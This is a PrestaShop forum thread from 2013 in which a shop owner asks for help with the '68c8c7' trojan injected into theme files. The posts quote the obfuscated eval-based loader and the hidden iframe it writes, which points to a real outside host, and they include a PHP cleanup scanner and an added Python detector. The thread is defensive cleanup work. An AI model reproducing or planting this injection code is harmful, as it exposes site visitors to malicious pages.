Anony Posted March 1, 2013 (edited)

Hi. I'm still running PrestaShop 1.4x because the skin I've bought doesn't have an update for v. 1.5x. A month ago my site (the link is in my personal specs) got an intrusion: they infiltrated code which displays an iframe at the height of the header part (you can see it in my pages). This was apparently caused by the insertion of a js snippet inside all the tpl files, js files and php files of this skin. This snippet apparently causes some malfunctions overall, such as scrambling the page. The js in question should be the following code:

<!--68c8c7--><script type="text/javascript" language="javascript" > asgq=[hex array of 484 byte values omitted];try{document.body|=1}catch(gdsgsdg){zz=3;dbshre=183;if(dbshre){vfvwe=0;try{}catch(agdsg){vfvwe=1;}if(!vfvwe){e=window["eval"];}s="";for(i=0;i-484!=0;i++){if(window.document)s+=String.fromCharCode(asgq[i]);}z=s;e(s);[spam-filter]</script><!--/68c8c7-->

The code apparently output by this js appears as the first lines in the source of every page, and it is the following:

<script type="text/javascript" language="javascript" >
(function () {
    var id = '7';
    var cb09 = document.createElement('iframe');
    cb09.src = 'http://www.torsdagsherrer.skjern-net.dk/dtd.php';
    cb09.style.position = 'absolute';
    cb09.style.border = '1';
    cb09.style.height = '31px';
    cb09.style.width = '42px';
    cb09.style.left = '500px';
    cb09.style.top = '100px';
    if (!document.getElementById('cb')) {
        document.write('<style>body{overflow-x:hidden;}</style>');
        document.write('<div id=\'cb\' style="position:absolute; width:80%; height:100%;" ></div>');
        document.getElementById('cb').appendChild(cb09);
    [spam-filter])();
</script>

Moreover, I also see in many php files the following junk (if that's what it is):

?> <? #68c8c7# echo " <script type="text/javascript" language="javascript" > asgq=[hex array of 460 byte values omitted];try{document.body|=1}catch(gdsgsdg){zz=3;dbshre=3;if(dbshre){vfvwe=0;try{}catch(agdsg){vfvwe=1;}if(!vfvwe){e=window["eval"];}s="";for(i=0;i-460!=0;i++){if(window.document)s+=String.fromCharCode(asgq[i]);}z=s;e(s);[spam-filter]</script>"; #/68c8c7# ?> <? ?>

I've tried to remove all this stuff manually, one by one, but the task was apparently impossible, also because I saw that nothing changed anyway after each refresh of the site. So I replaced the currently affected skin again with the original one via ftp, though the iframe is still there.

I cannot reinstall the theme from the admin panel, because the admin panel also seems to be affected, and when I try to click any link to upload modules or expand the module accordion, I'm redirected to a 404 page on my frontend site, saying "sorry, the web address is no longer available" (translated more or less into English by me from my language). I cannot even click the rotating banner at the center (which seems to load forever) in order to see what makes it behave that way. The guy who crafted this skin doesn't know what to do. Perhaps someone could help me please? Thanks in advance.

Edited March 2, 2013 by Anony
Dh42 Posted March 3, 2013

This is what I would do. I would download your whole site and use a text editor like Sublime Text to search and replace in all of the files for the javascript string, replacing it with nothing. Then upload the site, change your ftp information and test it.
Anony Posted March 3, 2013 (Author)

Hi. I already downloaded it and tried to do this, but the files are many, and I don't know where to search, or exactly what to search for (these 3 snippets are what I have found so far; I don't know if there are others), and what is added by the "virus".
Dh42 Posted March 3, 2013

I would search for these 3 snippets first. Sublime Text will let you search in all of the files for the snippets, so you can search the whole folder of files with one search.
Anony Posted March 4, 2013 (Author)

Ok, trying it and I'll inform you. Thanks for now.
Anony Posted March 4, 2013 (Author)

But... I guessed that that app would remove the code from ALL files in the folders at once: should I open them and search in each by hand? But... couldn't I make it shorter if I re-upload the whole 1.4x PrestaShop, replacing the old infected files at once, whatever they are?
HCC Posted March 7, 2013

Try this: copy and paste this into a txt file and put it at the base of your webserver with a .php extension. You may have to adapt it to your malware (anyway, replace the "js" folder with a blank one from your PrestaShop version, and set the chmod to 777 before you run the script). Run the script with your browser: www.yoursite/the-name-of-your-file.php. After running it, make it run one more time to see if it has worked (good luck).

<?php
/**
 * Simple trojan scanner to fix some tedious trojans that
 * corrupt some files on the server.
 *
 * You can modify this code as you need. To add a new trojan fix,
 * simply add a method that takes a file path as input and returns
 * the appropriate exit status (see the FixExitStatus class for details), and add the
 * trojan name and the method name to the fixList[] array for the callback.
 * See fix68c8c7() for an example.
 *
 * Currently supported trojan:
 * - 68c8c7 (Thanks to fatsouls32 - http://www.freestuff.gr/forums/viewtopic.php?t=64419 for 336988 regex fix)
 */
class SimpleFixScanner
{
    public $fileTypeToScan = array('php', 'html', 'htm', 'tpl', 'js');
    public $fixList = array(
        //'Scanner Regex Check' => 'devCheckRegex', // Use to check which files are scanned
        'Trojan 68c8c7' => 'fix68c8c7',
    );
    public $startTime;
    public $memoryLimit = "200M";
    public $docRoot;
    public $filesToScan;
    public $filesScannedCount = 0;
    public $filesFixed = array();

    /**
     * Wrapper for the scan process
     * @see $this->doScan()
     */
    public function scan()
    {
        echo "<h3>Simple Fix Scanner</h3>";
        echo "<hr />";
        echo "<p>Prepare the scanner... ";
        $this->prepareScanner();
        echo "<i>done</i>";
        echo "<br><small>(Directory: " . $this->docRoot . ")</small></p>";

        // Do the scan process
        echo "<p>Do scan... ";
        $this->doScan();
        echo "<i>done</i></p>";

        // Echo scan results
        $fileFixedCount = count($this->filesFixed);
        if ($fileFixedCount > 0) {
            echo "<h4>Matches:</h4>";
            echo "<p>Fixed " . $fileFixedCount . " of " . $this->filesScannedCount . " files scanned</p>";
            echo "<ul>";
            foreach ($this->filesFixed as $item) {
                $exitStatus = FixExitStatus::translateExitStatus($item['exitStatus']);
                echo "<li>{$exitStatus} - <strong>{$item['fix']}</strong> was found in file {$item['file']}</li>";
            }
            echo "</ul>";
        } else {
            echo "<h4>No match found.</h4>";
            echo "<p>{$this->filesScannedCount} files scanned.</p>";
        }
        $endtime = microtime(true);
        $totaltime = ($endtime - $this->startTime);
        echo "<p><small>Time elapsed: " . $totaltime . " seconds</small></p>";
    }

    /**
     * Prepare the scanner: raise the memory limit, start the timer,
     * default to the document root and collect the file list.
     */
    public function prepareScanner()
    {
        ini_set('memory_limit', $this->memoryLimit);
        $this->startTime = microtime(true);
        if (!$this->docRoot) {
            $this->docRoot = $_SERVER['DOCUMENT_ROOT'];
        }
        $this->filesToScan = $this->getFilesToScan($this->docRoot);
    }

    /**
     * Execute the scan process: run every registered fix on every file
     */
    public function doScan()
    {
        foreach ($this->filesToScan as $search) {
            $this->filesScannedCount++;
            foreach ($this->fixList as $name => $method) {
                $checkFile = call_user_func(array($this, $method), $search[0]);
                if ($checkFile != FixExitStatus::FILE_OK) {
                    $this->filesFixed[] = array('fix' => $name, 'file' => $search[0], 'exitStatus' => $checkFile);
                }
            }
        }
    }

    /**
     * Helper to get the list of the files to scan
     */
    public function getFilesToScan($rootDir)
    {
        $directoryIterator = new RecursiveDirectoryIterator($rootDir, FilesystemIterator::SKIP_DOTS);
        $iterator = new RecursiveIteratorIterator($directoryIterator);
        $regex = '/^.+\.(' . implode("|", $this->fileTypeToScan) . ')$/i';
        // GET_MATCH yields the preg_match() array for each path; index 0 is the full path
        $files = new RegexIterator($iterator, $regex, RegexIterator::GET_MATCH);
        return $files;
    }

    /**
     * Return true, just to check if the regex works.
     * @param string $path
     */
    public function devCheckRegex($path)
    {
        return is_file($path);
    }

    /**
     * Check and fix file for: 68c8c7 Trojan
     * @param string $path
     * @return int FixExitStatus::FILE_FIXED if the trojan was found and removed; otherwise FixExitStatus::FILE_OK
     */
    public function fix68c8c7($path)
    {
        $fileFixed = FixExitStatus::FILE_OK;
        $regexPatterns = array(
            "/#68c8c7#(.*?)#\/68c8c7#/ism",             // php
            "/\<!--68c8c7-->(.*?)\<!--\/68c8c7-->/ism", // html
            '#(/\*68c8c7\*/).*?(/\*/68c8c7\*/)#ism',    // js
        );
        $data = file_get_contents($path);
        foreach ($regexPatterns as $regex) {
            if (preg_match($regex, $data)) {
                // If found, replace the malicious code with an empty string
                $data = preg_replace($regex, "", $data);
                $fileFixed = FixExitStatus::FILE_FIXED;
            }
        }
        if ($fileFixed != FixExitStatus::FILE_OK) {
            file_put_contents($path, $data);
        }
        return $fileFixed;
    }
}

final class FixExitStatus
{
    private function __construct() {}

    // fix exit status
    const FILE_OK = 0;
    const FILE_FIXED = 1;
    const CANT_FIX = 2;

    public static function translateExitStatus($status)
    {
        switch ($status) {
            case FixExitStatus::FILE_OK:
                return "File is safe";
            case FixExitStatus::FILE_FIXED:
                return "File fixed";
            case FixExitStatus::CANT_FIX:
                return "Can't fix file";
        }
        return "Unknown status";
    }
}

/*
 * Sample class usage (placed after the class definitions)
 */
$scanner = new SimpleFixScanner();
$scanner->scan();
?>
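To triage a downloaded copy of the site before running HCC's fixer, here is an added Python script (not from the thread, PrestaShop or HCC) that finds the 68c8c7-wrapped blocks shown in the first post, decodes the hex array without executing it so the iframe src is visible, and, going beyond the thread, also flags the same String.fromCharCode/eval loader shape where the 68c8c7 wrapper is absent. It only reads files; the sample file at the bottom is constructed, with a placeholder host in place of the real one.

```python
import re
from pathlib import Path

# Wrapper markers seen in this thread (PHP, HTML) plus the JS form HCC's scanner matches.
MARKERS = {
    "php":  re.compile(r"#68c8c7#(.*?)#/68c8c7#", re.S),
    "html": re.compile(r"<!--68c8c7-->(.*?)<!--/68c8c7-->", re.S),
    "js":   re.compile(r"/\*68c8c7\*/(.*?)/\*/68c8c7\*/", re.S),
}
# Shape of the loader itself, independent of the marker: an array of 0x.. bytes rebuilt
# with String.fromCharCode and handed to eval (the array is decoded here, never run).
HEX_ARRAY = re.compile(r"\[\s*(0x[0-9a-fA-F]+(?:\s*,\s*0x[0-9a-fA-F]+)*)\s*,?\s*\]")
FROMCHAR = re.compile(r"String\.fromCharCode")
EVAL_REF = re.compile(r"""window\[["']eval["']\]|\beval\s*\(""")
IFRAME_SRC = re.compile(r"""\.src\s*=\s*["']([^"']+)["']""")
SCAN_EXTS = {".php", ".html", ".htm", ".tpl", ".js"}

def looks_like_loader(body):
    return bool(HEX_ARRAY.search(body) and FROMCHAR.search(body) and EVAL_REF.search(body))

def decode_hex_array(body):
    """Turn the 0x.. array back into the source it hides, without executing it."""
    m = HEX_ARRAY.search(body)
    return "".join(chr(int(v, 16)) for v in m.group(1).split(",")) if m else None

def triage(text):
    """Findings for one file: which marker wraps the code, whether it evals, iframe src."""
    spans = [(n, m.group(1)) for n, p in MARKERS.items() for m in p.finditer(text)]
    if not spans and looks_like_loader(text):
        spans = [("unmarked", text)]  # same loader shape, no 68c8c7 wrapper
    out = []
    for marker, body in spans:
        decoded = decode_hex_array(body) or ""
        src = IFRAME_SRC.search(decoded)
        out.append({"marker": marker, "loader": looks_like_loader(body),
                    "decoded_src": src.group(1) if src else None})
    return out

def scan_tree(root):
    """Walk a downloaded copy of the site (read-only) and report what was found per file."""
    hits = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in SCAN_EXTS:
            found = triage(path.read_text(errors="replace"))
            if found:
                hits[str(path)] = found
    return hits

# Constructed sample modelled on the thread's PHP variant: a harmless loader pointing at a
# placeholder host, hex-encoded the same way the real injection was.
_PAYLOAD = "(function () { var w = document.createElement('iframe'); w.src = 'http://example.invalid/clicker.php'; })();"
SAMPLE_FILE = ('<?php echo "hello"; ?> <? #68c8c7# echo "<script> asgq=['
               + ",".join(hex(ord(c)) for c in _PAYLOAD)
               + "];s='';for(i=0;i<asgq.length;i++){s+=String.fromCharCode(asgq[i]);}"
               + "e=window['eval'];e(s);</script>\"; #/68c8c7# ?>")
```

Run `scan_tree("/path/to/site-copy")` on the download and compare the decoded src values against the two hosts quoted in the first post; any file listed as "unmarked" is one HCC's marker-based regexes would leave in place.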
Anony Posted March 9, 2013 (Author)

Hello HCC. I ran the script: the files were all cleaned (in fact the div has disappeared). Thanks. But... when I entered the admin, I received again an alarm from my antivirus (Avira); then, when I entered the "modules" section and tried to open one of the dropdown rows, I was again brought to the 404 error page, saying that the "requested file is no longer here"! Apparently there's still some problem backstage. What to do now?
lynn.chris9 Posted March 13, 2013

Anony, have you identified how the intrusion into your site happened? Is it through the theme? I doubt it.
Anony Posted March 13, 2013 (Author)

I'm afraid I don't catch what you tried to tell me.
Anony Posted March 13, 2013 (Author)

The provider tells me that the error_log_php file bears this line:

[11-Mar-2013 16:31:06 Europe/Berlin] PHP Deprecated: Directive 'safe_mode' is deprecated in PHP 5.3 and greater in Unknown on line

They also added that I should "debug the application" in order to understand where the application tries to perform operations related to safe_mode. It's Turkish to me.
lynn.chris9 Posted March 13, 2013

Anony, it seems the provider is using the latest PHP, i.e. 5.4.x. I would suggest you upgrade to the latest Presta.
Anony Posted April 11, 2013 (Author)

Hi Lynn (sorry for the delay; I wonder why so far I haven't received any mail updates of new posts... I came here just out of curiosity whether anybody had found any solution!); as I said, it seems that the skin I'm using (and paid for) is not ok for PS versions higher than 1.4x (and it seems that its coder doesn't have any will to make an upgrade). So far I'm stuck. The site warns that there's a virus. The coder wouldn't enter the admin panel because "he's afraid" of the virus... What should I do now?
Anony Posted April 18, 2013 (Author)

bump?
AZC Posted April 10, 2014

@HCC that is genius! It's brilliant, worked perfectly!
jetx Posted April 24, 2014

Anony, it appears you have no full site backups? If you do, then simply use something like WinMerge to compare folders and files. You also need to plug whatever hole your site has (whether it be outdated and vulnerable software or another means). Based on the date you were hacked, can your hosting company send you the log?